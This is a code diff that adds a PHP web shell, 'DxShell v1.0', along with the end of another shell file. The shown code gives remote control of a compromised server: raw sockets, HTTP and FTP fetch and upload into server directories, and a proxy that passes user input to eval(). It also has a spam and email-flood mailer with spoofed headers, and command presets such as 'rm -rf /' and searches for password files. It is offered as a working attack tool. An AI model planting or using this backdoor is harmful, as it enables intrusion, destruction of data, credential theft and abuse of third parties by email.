+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))		{		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{	if (!isset($_GET['dxparam']))
+		{
+		print '';		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/php/DxShell v1.0.php b/php/DxShell v1.0.php
new file mode 100644
index 0000000..5d7699b
--- /dev/null
+++ b/php/DxShell v1.0.php	
@@ -0,0 +1,2031 @@
+<?php
+$GLOB['SHELL']['USER']['Login']='';
+$GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ# 1227-700
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{
	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;
print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
